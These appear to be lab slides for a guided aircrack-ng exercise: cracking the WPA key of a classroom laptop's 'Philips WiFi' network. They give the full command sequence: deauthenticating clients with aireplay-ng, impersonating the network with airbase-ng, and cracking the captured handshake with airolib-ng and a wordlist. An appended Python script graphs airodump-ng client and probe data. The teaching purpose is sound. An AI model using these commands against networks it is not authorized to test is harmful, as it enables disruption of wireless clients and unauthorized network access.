2_Guided - Aircrack-ng


Practical stuff
• Crack the WPA key of this laptop.
• SSID: « Philips WiFi »
• Password list and cowpatty table available on CD (only useful today).
Practical stuff - Tips
• Make sure to disable all network managers and other programs using wireless interfaces:
– airmon-ng check kill
• Madwifi-ng
– airmon-ng stop ath0
– airmon-ng start wifi0
• If you don't see the handshake with aircrack-ng (or any other tool), open your capture file with wireshark and filter it with « eapol ».
Steps
1. Get the handshake
• With the AP
• Without the AP
2. Create airolib-ng database
3. Crack the handshake
Get the handshake – With AP
• Start airodump-ng to find the channel of the AP:
airodump-ng INTERFACE
• Make sure a client is connected. If there are none, you won't be able to get the handshake.
• When you have the channel, stop the previous instance (Ctrl-C) and start it again on the channel of the AP (and save packets):
airodump-ng -c AP_CHANNEL -w philips-capture INTERFACE
• Open a new terminal and deauthenticate the client:
aireplay-ng --deauth 1 -a BSSID -c CLIENT_MAC INTERFACE
• If you didn't get it, try again without specifying the client MAC (some drivers prefer broadcast deauth):
aireplay-ng --deauth 1 -a BSSID INTERFACE
Get the handshake – Without AP
• Start airbase-ng
– WPA-PSK (TKIP)
– SSID: Philips WiFi
– Do not answer to any other probe request
– Channel 6
– Save packets into philips-capture
airbase-ng -z 2 -W 1 -e "Philips WiFi" -y -c 6 -F philips-capture rausb0
Notes:
• I'll do this; everybody doing it at once may not give the expected result :)
• However, you can start airodump-ng on channel 6:
airodump-ng -c 6 -w philips-capture INTERFACE
• A bug in madwifi-ng prevents it from working correctly with airbase-ng
Creating airolib-ng database
• Since a cowpatty table already exists, we'll use it with airolib-ng:
– Output database: philips_airolib
– Import cowpatty file "Philips WiFi"
airolib-ng philips_airolib --import cowpatty "Philips WiFi"
Crack the handshake
• Use aircrack-ng to crack the key:
– Capture file: philips-capture-01.cap
• Using airolib-ng database:
aircrack-ng -r philips_airolib philips-capture-01.cap
• Using a wordlist:
aircrack-ng -w passphrases.txt philips-capture-01.cap
Practical stuff - Airgraph-ng
• Creates a picture of the wireless networks seen by airodump-ng.
• Whether you are a wardriver or just want to monitor your own network, this is for you.
Practical stuff - Airgraph-ng (2)
Practical stuff - Airgraph-ng (3)
• Run airodump-ng with the parameters you want (however -w is mandatory to make it work, since airgraph-ng reads the CSV file airodump-ng writes).
• Airodump-ng writes the CSV file every 5 seconds.
• Whenever you want, start airgraph-ng on the CSV file.
Practical stuff - Airgraph-ng (4)
• Parameters:
– Input file: Airodump-ng CSV file (.txt)
– Graph type:
• CAPR (Client – AP Relationship): Connected clients
• CPG (Common Probe Graph): Probed SSIDs
– Output file: Picture file name
• Examples:
– CAPR: airgraph-ng.py -i ../airgraph-01.txt -t CAPR -o ../airgraph-capr.png
– CPG: airgraph-ng.py -i ../airgraph-01.txt -t CPG -o ../airgraph-cpg.png
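As an added example (not part of these slides or of the aircrack-ng project), here is a small Python parser for the airodump-ng CSV file that builds the same two views airgraph-ng draws: CAPR (which client is associated to which ESSID) and CPG (which ESSIDs each client probes for). The CSV layout and the sample rows are assumptions I constructed from memory of airodump-ng output, not a real capture; the one format quirk it handles is that the probed-ESSID column is itself comma-joined.

```python
import csv
from collections import defaultdict

# Constructed sample in the airodump-ng CSV layout as I recall it (AP table, then a
# "Station MAC" table); MACs and timestamps are made up, not from a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-01-01 10:00:00, 2010-01-01 10:05:00,  6,  54, WPA, TKIP, PSK, -40, 120, 0, 0.  0.  0.  0, 12, Philips WiFi, 
66:77:88:99:AA:BB, 2010-01-01 10:00:00, 2010-01-01 10:05:00, 11,  54, OPN, , , -70, 30, 0, 0.  0.  0.  0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-01-01 10:01:00, 2010-01-01 10:05:00, -50, 40, 00:11:22:33:44:55, Philips WiFi
AA:BB:CC:DD:EE:02, 2010-01-01 10:02:00, 2010-01-01 10:05:00, -60, 10, (not associated), HomeNet,Philips WiFi
AA:BB:CC:DD:EE:03, 2010-01-01 10:02:00, 2010-01-01 10:05:00, -55, 25, 66:77:88:99:AA:BB, 
"""

def parse_airodump_csv(text):
    """Return (aps, stations): BSSID -> ESSID, and one dict per client row."""
    lines = text.splitlines()
    split = next(i for i, line in enumerate(lines) if line.startswith("Station MAC"))
    aps = {}
    for row in csv.reader(lines[:split], skipinitialspace=True):
        if len(row) >= 14 and row[0] != "BSSID":  # skip blank lines and header
            aps[row[0]] = row[13].strip()
    stations = []
    for row in csv.reader(lines[split + 1:], skipinitialspace=True):
        if len(row) < 6:
            continue
        # Probed ESSIDs are comma-joined in the last column, so every field from
        # index 6 onward belongs to that list; an empty field means no probes.
        probes = [p.strip() for p in row[6:] if p.strip()]
        stations.append({"mac": row[0], "bssid": row[5].strip(), "probes": probes})
    return aps, stations

def capr(aps, stations):
    """Client-AP relationship: ESSID -> sorted MACs of clients associated to it."""
    rel = defaultdict(list)
    for s in stations:
        if s["bssid"] in aps:  # drops "(not associated)" clients
            rel[aps[s["bssid"]]].append(s["mac"])
    return {essid: sorted(macs) for essid, macs in rel.items()}

def cpg(stations):
    """Common probe graph: probed ESSID -> sorted MACs of clients asking for it."""
    graph = defaultdict(list)
    for s in stations:
        for essid in s["probes"]:
            graph[essid].append(s["mac"])
    return {essid: sorted(macs) for essid, macs in graph.items()}
```

Running `capr` and `cpg` over a real airodump-ng CSV shows at a glance which clients of your own network are also probing for other SSIDs, which is the monitoring use the slides mention.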